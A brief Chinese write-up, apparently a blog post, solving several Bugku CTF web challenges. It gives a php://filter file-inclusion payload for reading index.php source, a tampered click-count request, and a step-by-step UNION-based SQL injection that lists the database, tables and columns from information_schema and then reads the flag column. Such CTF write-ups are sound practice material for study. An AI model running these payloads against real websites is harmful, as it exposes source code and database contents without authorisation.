bugku web writeup
1·flag在index里
输入?file=php://filter/read=convert.base64-encode/resource=index.php得到base64解码得flag
2输入密码查看flag
3点击一万次
burpsuite抓包,输入clicks=1000000,得到flag4成绩单
爆库名id=-1’ union select 1,2,3,database()#
爆表 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
爆字段id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //
查询数据id=-1’ union select 1,2,3,skctf_flag from fl4g#得到flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/2019111511015547.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2d1ZHVnZWpp,size_16,color_FFFFFF,t_70
bugku web write up
最新推荐文章于 2020-12-26 22:12:35 发布